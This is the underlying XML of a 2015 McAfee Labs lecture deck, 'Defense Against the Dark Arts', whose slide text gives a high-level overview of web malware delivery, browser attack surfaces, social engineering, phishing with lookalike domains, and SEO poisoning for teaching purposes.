            <a:ext cx="13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Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Defense  Against  the  Dark  Arts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13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476"/>
            <a:ext cx="1712899" cy="55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1249406" y="1131163"/>
            <a:ext cx="6693244" cy="1079365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3720"/>
              </a:lnSpc>
              <a:defRPr sz="3000" b="0" i="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="B71234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Title of Presentation </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FRANKLIN GOTHIC MEDIUM 30PT</a:t>
            </a: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1249407" y="2174097"/>
            <a:ext cx="6700108" cy="394222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="8E99A0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Subtitle of Presentation Franklin Gothic Medium 16pt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1105931" y="919893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 userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1105931" y="2712994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OSU Logo - Losange" hidden="1"/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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8244914" y="59531"/>
            <a:ext cx="990600" cy="741211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="CalPoly Logo" descr="http://upload.wikimedia.org/wikipedia/en/thumb/d/d9/CalPoly_Seal.svg/2000px-CalPoly_Seal.svg.png" hidden="1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628" y="57150"/>
            <a:ext cx="655172" cy="6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SU Logo - Square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001" y="66675"/>
            <a:ext cx="617599" cy="65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84185"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">
    <p:wipe dir="r"/>
  </p:transition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1">
                <a:alpha val="0"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="36000">
              <a:srgbClr val="8E99A0">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="D1D4D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3" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="631825" y="472802"/>
            <a:ext cx="6134101" cy="5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ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="soft" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="44450" contourW="12700">
              <a:bevelT w="38100" h="38100"/>
              <a:bevelB w="38100" h="38100"/>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d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8599" y="1574338"/>
            <a:ext cx="7073151" cy="301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/>
          <a:p>
            <a:pPr marL="172921" lvl="0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/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="172921" lvl="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/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="172921" lvl="2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/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="172921" lvl="3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/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="172921" lvl="4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2905" y="4793904"/>
            <a:ext cx="607326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A5ACAF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{659A5FE0-7283-4E23-82C6-1CCE5B0C9659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med">
    <p:wipe dir="r"/>
  </p:transition>
  <p:hf sldNum="0" hdr="0" ftr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2100" b="0" i="0" cap="all" baseline="0" dirty="0" smtClean="0">
          <a:solidFill>
            <a:srgbClr val="8E99A0"/>
          </a:solidFill>
          <a:latin typeface="Franklin Gothic Medium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5pPr>
      <a:lvl6pPr marL="456888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6pPr>
      <a:lvl7pPr marL="91377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7pPr>
      <a:lvl8pPr marL="1370664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8pPr>
      <a:lvl9pPr marL="1827552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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="172921" indent="-172921" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="95000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="800"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="200"/>
        </a:spcAft>
        <a:buChar char="•"/>
        <a:defRPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="569523" indent="-223684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–"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="915363" indent="-172921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•"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1311966" indent="-225272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–"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1660979" indent="-228444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»"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2117867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574755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031642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488531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8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75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64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52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39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327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216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104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formation_securit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hyperlink" Target="http://en.wikipedia.org/wiki/Confidence_trick" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Psychological_manipula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oregonstate.eclu/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arnazon.com/prime/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.l/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.rnicrosoft.com/en-us/download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ayp&#1072;l.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://oregonstate.eciu/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.i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anking.example/onlinebanking/login.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://1.2.3.4/onlinebank/login.html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foo.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://foo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bar.com/pages/page1.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bar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ar.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://foo.com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catforums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diagramData" Target="../diagrams/data4.xml"/><Relationship Id="rId12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microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing4.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62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61.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramQuickStyle" Target="../diagrams/quickStyle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cedric_cochin@mcafee.com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Security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87840" y="2960559"/>
            <a:ext cx="5398322" cy="394222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defense Against The Dark Arts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7999" y="3878645"/>
            <a:ext cx="2175566" cy="430883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Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Cedric Cochin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Intel Security - McAfee Labs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1787837" y="3327958"/>
            <a:ext cx="5398322" cy="39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1066"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2100" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Franklin Gothic Medium"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="759263" indent="-298206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–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1220321" indent="-230530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•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749055" indent="-300322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–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2214343" indent="-304552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»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823446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3432549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4041650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4650754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100" kern="0" dirty="0"/>
              <a:t>February, 2015</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3643705914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WEB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\UltraBookiX\Downloads\Internet_Key_Laye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7438"/>
            <a:ext cx="5638800" cy="394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5726420" y="2670994"/>
            <a:ext cx="3759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Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"Internet Key Layers" by Concord </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hioz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - Own work. Licensed under CC BY-SA 4.0 via Wikimedia Commons </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://commons.wikimedia.org/wiki/File:Internet_Key_Layers.png#mediaviewer/File:Internet_Key_Layers.png</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2518922750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WEB-BASED MALWARE DELIVERY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935441193"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="495300" y="112268"/>
          <a:ext cx="8153400" cy="386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ight Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="2742140"/>
            <a:ext cx="8001000" cy="4846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3193018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1994		    2000                         2005			2015	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2120419" y="3562350"/>
            <a:ext cx="48269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95% of malware are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delivered via the web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42850037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 1.0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42115" y="5257800"/>
            <a:ext cx="19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r>
              <a:rPr lang="en-US" b="1" baseline="30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rd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Party Attacks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95401" y="1200150"/>
            <a:ext cx="6019800" cy="4572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Network/Protocol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95400" y="2266950"/>
            <a:ext cx="6019801" cy="4572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DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Document Object Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]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95400" y="3486150"/>
            <a:ext cx="6019801" cy="10972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Graphical Interface/Input Devices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47801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Frame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120228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00600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Widget</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Down Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="173355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rot="10800000">
            <a:off x="2171701" y="173355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 rot="10800000">
            <a:off x="2171701" y="289560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4187028" y="289560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89409" y="1786523"/>
            <a:ext cx="1865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Protocol, URL, DATA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11624" y="2954923"/>
            <a:ext cx="1072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User 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62700" y="1782346"/>
            <a:ext cx="607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DATA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48200" y="2954923"/>
            <a:ext cx="106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Rendering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807311" y="2895600"/>
            <a:ext cx="1507890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7232663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 2.0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42115" y="5257800"/>
            <a:ext cx="19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r>
              <a:rPr lang="en-US" b="1" baseline="30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rd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Party Attacks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5401" y="1200150"/>
            <a:ext cx="6019800" cy="4572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Network/Protocol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95400" y="2266950"/>
            <a:ext cx="6019801" cy="4572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95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Document Object Model 1, 2 &amp;3]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95400" y="3486150"/>
            <a:ext cx="6019801" cy="10972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Graphical Interface/Input Devices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6735209" y="2663191"/>
            <a:ext cx="3383281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47801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Frame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20228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00600" y="3704028"/>
            <a:ext cx="1447800" cy="32624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600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Widget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5943600" y="173355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 rot="10800000">
            <a:off x="2171701" y="173355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0800000">
            <a:off x="2171701" y="289560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4187028" y="2895600"/>
            <a:ext cx="381000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="down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89409" y="1786523"/>
            <a:ext cx="1865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Protocol, URL, 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11624" y="2954923"/>
            <a:ext cx="1072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User Input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62700" y="1782346"/>
            <a:ext cx="607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2954923"/>
            <a:ext cx="106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Rendering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Left-Right Arrow 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7429500" y="1276350"/>
            <a:ext cx="677857" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 46909"/>
              <a:gd name="adj2" fmla="val 38793"/>
            </a:avLst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29" name="Left-Right Arrow 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7429500" y="2312670"/>
            <a:ext cx="677857" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 46909"/>
              <a:gd name="adj2" fmla="val 38793"/>
            </a:avLst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0" name="Left-Right Arrow 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7429500" y="3664511"/>
            <a:ext cx="677857" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 46909"/>
              <a:gd name="adj2" fmla="val 38793"/>
            </a:avLst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43755" y="2693134"/>
            <a:ext cx="649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Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Update</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Boo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94154" y="165735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XHR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3754" y="4034790"/>
            <a:ext cx="6493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Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Update</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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2282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POINTS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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1379361946"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1466963" y="971550"/>
          <a:ext cx="4191000" cy="3690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6343763" y="4029730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 Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network layer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734163" y="4281160"/>
            <a:ext cx="55138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34163" y="3519160"/>
            <a:ext cx="55138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43763" y="3300740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WinInet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ETW/ETL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5734163" y="1995160"/>
            <a:ext cx="55138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734163" y="1233160"/>
            <a:ext cx="55138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343763" y="1824394"/>
            <a:ext cx="1250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Script Engine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43763" y="1047750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Browser/Extensions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" i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5734163" y="2790170"/>
            <a:ext cx="55138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43763" y="2644973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Browser/Extensions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200331581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User-LEVEL Attacks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weak link makes a nice cracking sound when it snaps!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3309227533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802387" cy="3733800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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In the context of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="Information security"/>
              </a:rPr>
              <a:t>information security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, refers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4" tooltip="Psychological manipulation"/>
              </a:rPr>
              <a:t>psychological manipulation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of people into performing actions or divulging confidential information. A type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId5" tooltip="Confidence trick"/>
              </a:rPr>
              <a:t>confidence trick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> for the purpose of information gathering, fraud, or system access, it differs from a traditional "con" in that it is often one of many steps in a more complex fraud scheme.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6" hidden="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895350"/>
            <a:ext cx="2743200" cy="411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9494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common WEB USER – A SITTING DUCK?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6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895350"/>
            <a:ext cx="2743200" cy="411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01700"/>
            <a:ext cx="47625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773706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4525787" cy="373380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</a:rPr>
              <a:t>Users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" strike="sngStrike" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>can be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ARE the weak link.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Hardened/current browser/OS will not help.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Exploit common user traits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Impatient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lazy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Self-proclaimed omniscience</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Clickaholic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin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</a:rPr>
              <a:t>Direct the user to malicious content through their own actions.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Executables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Browser exploits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Malicious forms</a:t>
            </a:r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12820905"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5029200" y="971550"/>
          <a:ext cx="3886200" cy="347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2537407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3839987" cy="3733800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not just restricted to banking/financial anymore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URLs not always delivered via email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spear phishing, social media, and snowshoe spam continues to keep it alive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Valid SSL cert does not always protect the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sites are very short-lived</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6150" name="Picture 6" descr="https://www.eff.org/files/images_insert/april_11%20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97793"/>
            <a:ext cx="4447211" cy="24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393827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Who’s this guy?!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1673" y="1443990"/>
            <a:ext cx="8229600" cy="14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19100" indent="-382588">
              <a:buClr>
                <a:srgbClr val="CCCCCC"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" kern="0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Hi, I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" kern="0" dirty="0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’m @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>cedric</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3600" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="419100" indent="-382588">
              <a:buClr>
                <a:srgbClr val="CCCCCC"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" kern="0" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Cedric" descr="http://www.downtownstl.org/wp-content/uploads/2014/09/cedr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76350"/>
            <a:ext cx="4461085" cy="33458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07"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1125682">
            <a:off x="4735940" y="1398340"/>
            <a:ext cx="3174945" cy="3153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730686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SEO Poisoning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4090550" cy="3733800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify trends using available tools such as Google Trends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use search results to lure the web-searching victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Celebrities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Pop Culture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>World Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
